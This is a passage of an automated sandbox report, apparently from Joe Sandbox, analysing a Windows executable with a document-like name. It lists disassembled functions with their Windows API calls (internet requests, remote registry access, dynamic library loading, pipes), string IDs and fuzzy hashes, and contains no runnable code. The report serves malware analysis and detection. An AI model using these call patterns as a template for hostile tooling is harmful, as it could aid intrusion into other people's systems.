                                                        • Instruction Fuzzy Hash: D121F571A01108FADB18ABB4CC8ADFE776DEF06360F04412DF425E72E1DE39588ADA10
                                                        Function 00847B93 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00847C4A
                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00847C58
                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00847C5F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$DestroyWindow
                                                        • String ID: 0R$msctls_updown32
                                                        • API String ID: 4014797782-389527805
                                                        • Opcode ID: 3cd6284d669f09fda0ec5020c927c9adbbb3e39ce0f6328fb0ce71a21f1d3a70
                                                        • Instruction ID: 0e968bc585dd3e48b771cbb49a4c1e3570958ffbe2350ad4aa1ce21ab5febaea
                                                        • Opcode Fuzzy Hash: 3cd6284d669f09fda0ec5020c927c9adbbb3e39ce0f6328fb0ce71a21f1d3a70
                                                        • Instruction Fuzzy Hash: F02139B5604218AFDB10DF28DCC5DA777ACFB5A3A4B150059FA15DB3A1CB31EC118BA0
                                                        Function 0083182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0083184C
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00831872
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008318A2
                                                        • InternetCloseHandle.WININET(00000000), ref: 008318E9
                                                          • Part of subcall function 00832483: GetLastError.KERNEL32(?,?,00831817,00000000,00000000,00000001), ref: 00832498
                                                          • Part of subcall function 00832483: SetEvent.KERNEL32(?,?,00831817,00000000,00000000,00000001), ref: 008324AD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                        • String ID:
                                                        • API String ID: 3113390036-3916222277
                                                        • Opcode ID: 4ac40a5a6e94d76d33c54ebd524042ad0d98d80802cb15825f0c0667ec9816d9
                                                        • Instruction ID: b1ce2df13d4003a3672052a972c4b293d8406d08b62968effe604cc7e7ee44bf
                                                        • Opcode Fuzzy Hash: 4ac40a5a6e94d76d33c54ebd524042ad0d98d80802cb15825f0c0667ec9816d9
                                                        • Instruction Fuzzy Hash: 7621BBB1500308BFEB119B64CC89EBB7BEDFB89B48F10413AF905E2240EA648D0497F5
                                                        Function 0084C498 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • GetCursorPos.USER32(?), ref: 0084C4D2
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007FB9AB,?,?,?,?,?), ref: 0084C4E7
                                                        • GetCursorPos.USER32(?), ref: 0084C534
                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,007FB9AB,?,?,?), ref: 0084C56E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                        • String ID: 0R
                                                        • API String ID: 2864067406-1916035689
                                                        • Opcode ID: 89130ddaec4858ba0968cd5de915e9a12e5d2d3ddebf96503b71e005e86b8b83
                                                        • Instruction ID: 26bc0a98ca868f196e54727b40dbe4ced68f1e963273993c5c28b9236f84821c
                                                        • Opcode Fuzzy Hash: 89130ddaec4858ba0968cd5de915e9a12e5d2d3ddebf96503b71e005e86b8b83
                                                        • Instruction Fuzzy Hash: FD319E35601418EFCB658F58C858EAEBBB9FB09350F054069F905CB262C731AD50DBA4
                                                        Function 008463E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007C1D73
                                                          • Part of subcall function 007C1D35: GetStockObject.GDI32(00000011), ref: 007C1D87
                                                          • Part of subcall function 007C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007C1D91
                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00846461
                                                        • LoadLibraryW.KERNEL32(?), ref: 00846468
                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0084647D
                                                        • DestroyWindow.USER32(?), ref: 00846485
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                        • String ID: SysAnimate32
                                                        • API String ID: 4146253029-1011021900
                                                        • Opcode ID: 361d075a78cae3ff1b9c73ca472e74c255fc05e952739d704b048a1f6a0c707b
                                                        • Instruction ID: ed5568c5a502da6a3f504d6e64943167403a0ad00256054ea88cd4f372808d3a
                                                        • Opcode Fuzzy Hash: 361d075a78cae3ff1b9c73ca472e74c255fc05e952739d704b048a1f6a0c707b
                                                        • Instruction Fuzzy Hash: 80218B75200209EBEF104FA4DC84EBA37A9FB5A368F108629FA10D2191E731DC619766
                                                        Function 00826D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00826DBC
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00826DEF
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00826E01
                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00826E3B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: 1c8005b3688e7112e7217adb4f17dfd200239ac644dc7f21a499e98985ec0749
                                                        • Instruction ID: d8cb632ce369e819085d5503b0c1f6b3fbed8a9b88e77451402e9cc41cf9d017
                                                        • Opcode Fuzzy Hash: 1c8005b3688e7112e7217adb4f17dfd200239ac644dc7f21a499e98985ec0749
                                                        • Instruction Fuzzy Hash: 3221747960022DABDB209F39EC05A9A77F4FF45760F204A19FDA1D72D0E77199A0CB50
                                                        Function 00826E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00826E89
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00826EBB
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00826ECC
                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00826F06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: a64148e8c2a05b39a16c0d95c2e03268f8607f8ad3d903730372aa6883dc6dac
                                                        • Instruction ID: f8e0071aa27bfe7d394fce45c9ec05e024300d547bdf82aacb33367ef8aab3d6
                                                        • Opcode Fuzzy Hash: a64148e8c2a05b39a16c0d95c2e03268f8607f8ad3d903730372aa6883dc6dac
                                                        • Instruction Fuzzy Hash: 1421517D500325DBDB209F69E804A9A77A8FF55724F300A19FDA1D72D0E770A8A1C761
                                                        Function 0082AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0082AC54
                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0082ACA8
                                                        • __swprintf.LIBCMT ref: 0082ACC1
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0084F910), ref: 0082ACFF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                        • String ID: %lu
                                                        • API String ID: 3164766367-685833217
                                                        • Opcode ID: f82b1410f368ec5f545396880a3492e833af095ebf4052cc4c51e2b9e74494a8
                                                        • Instruction ID: d8abd6e3cca9e56632f5b98807a021bbac90c09b770bd22a9dea1a310fa99455
                                                        • Opcode Fuzzy Hash: f82b1410f368ec5f545396880a3492e833af095ebf4052cc4c51e2b9e74494a8
                                                        • Instruction Fuzzy Hash: F9213035A00109EFCB10DF69D949EAE7BB8FF49714B0040ADF909EB352DA75EA41CB61
                                                        Function 00821AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00821B19
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                        • API String ID: 3964851224-769500911
                                                        • Opcode ID: 2e1aafad52a582ce170d107e843d2ce6f2a6fea1aa43e3bf20e15dcf79d9d5e6
                                                        • Instruction ID: 010cf5c15f497e28d2883761cd64457422604ad9123f0e38518186d84e452f15
                                                        • Opcode Fuzzy Hash: 2e1aafad52a582ce170d107e843d2ce6f2a6fea1aa43e3bf20e15dcf79d9d5e6
                                                        • Instruction Fuzzy Hash: 89116531940158CFCF00DF94D8599FEB7B4FF29314B108469D818D7651EB325D4ACB50
                                                        Function 0083EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0083EC07
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0083EC37
                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0083ED6A
                                                        • CloseHandle.KERNEL32(?), ref: 0083EDEB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                        • String ID:
                                                        • API String ID: 2364364464-0
                                                        • Opcode ID: a5626614a8420f54f8f656f658ae904cf93fda0bc7a82142c6e7a9edf47a3e30
                                                        • Instruction ID: 769fc181010fd653639225d9fd7d42eb7273b0f00f673d2ae2452497dc2cc2a5
                                                        • Opcode Fuzzy Hash: a5626614a8420f54f8f656f658ae904cf93fda0bc7a82142c6e7a9edf47a3e30
                                                        • Instruction Fuzzy Hash: CD812F716047009FD760EF18C84AF6AB7E5EF88710F14881DFA95DB2D2D674AC418B91
                                                        Function 007E541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                        • String ID:
                                                        • API String ID: 1559183368-0
                                                        • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                        • Instruction ID: 95d38f3445d4af20fc5cc239dc96f7f28ff1b412953a00e105e7798070081fd6
                                                        • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                        • Instruction Fuzzy Hash: CC51E770A02B8DDBCB248F6BDC4456E77B7AF49328F248729F835962D1D7789D608B40
                                                        Function 00840037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                          • Part of subcall function 00840E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0083FDAD,?,?), ref: 00840E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008400FD
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0084013C
                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00840183
                                                        • RegCloseKey.ADVAPI32(?,?), ref: 008401AF
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 008401BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                        • String ID:
                                                        • API String ID: 3440857362-0
                                                        • Opcode ID: 4a5b8e5e9d93ffdc047cf40e33685983ae72e5b218d986647d36ff8d2f1c93b3
                                                        • Instruction ID: 7e2e2a9a448449bab5960545d3601822ef371a1a982c51e69a8c020627927e30
                                                        • Opcode Fuzzy Hash: 4a5b8e5e9d93ffdc047cf40e33685983ae72e5b218d986647d36ff8d2f1c93b3
                                                        • Instruction Fuzzy Hash: 25510771208208AFD714EB68C885E6BB7E9FF84314F40892DB695972A2DB35E944CB52
                                                        Function 0083D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0083D927
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0083D9AA
                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0083D9C6
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0083DA07
                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0083DA21
                                                          • Part of subcall function 007C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00827896,?,?,00000000), ref: 007C5A2C
                                                          • Part of subcall function 007C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00827896,?,?,00000000,?,?), ref: 007C5A50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 327935632-0
                                                        • Opcode ID: 546be67bef4eeb8fcb13c10fbf09ec960cb8729fb4a142ec8e0016921db76ec6
                                                        • Instruction ID: afcb60102ba84ef17c97e69db9b5776bedd1bb467f32a0e52becf49b862caefd
                                                        • Opcode Fuzzy Hash: 546be67bef4eeb8fcb13c10fbf09ec960cb8729fb4a142ec8e0016921db76ec6
                                                        • Instruction Fuzzy Hash: 0451F575A00209DFCB00EFA8D488EADBBF5FF49324F148069E955AB312DB35AD45CB91
                                                        Function 0082E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0082E61F
                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0082E648
                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0082E687
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0082E6AC
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0082E6B4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1389676194-0
                                                        • Opcode ID: 6e7bbd336b43a449e7e3d3a46b942d94eeb76133192ad5c7ddfe7396cec472b4
                                                        • Instruction ID: 101c6cc826aa34b36c0971180e0e6322cfe4a549fe478f4c4383812964fd8156
                                                        • Opcode Fuzzy Hash: 6e7bbd336b43a449e7e3d3a46b942d94eeb76133192ad5c7ddfe7396cec472b4
                                                        • Instruction Fuzzy Hash: 05510935A00215DFCB01EF65C989EADBBF5FF09314B1480A9E909AB362CB35ED51DB50
                                                        Function 008163AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008163E7
                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00816433
                                                        • TranslateMessage.USER32(?), ref: 0081645C
                                                        • DispatchMessageW.USER32(?), ref: 00816466
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00816475
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                        • String ID:
                                                        • API String ID: 2108273632-0
                                                        • Opcode ID: 089585590769609aae5b952c8b6e88222800e9efd45ff03c7b3f246c84a2fe2c
                                                        • Instruction ID: de11bf26719517b75b9f855835e58ad9f59e0b09f78b4a8d319fbf9f3b002c75
                                                        • Opcode Fuzzy Hash: 089585590769609aae5b952c8b6e88222800e9efd45ff03c7b3f246c84a2fe2c
                                                        • Instruction Fuzzy Hash: 9531DE31900616EFDB24CFB89C44BF67BACFF01304F14416AE5A1C21A1FB2598E9DBA4
                                                        Function 00818A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00818A30
                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00818ADA
                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00818AE2
                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00818AF0
                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00818AF8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
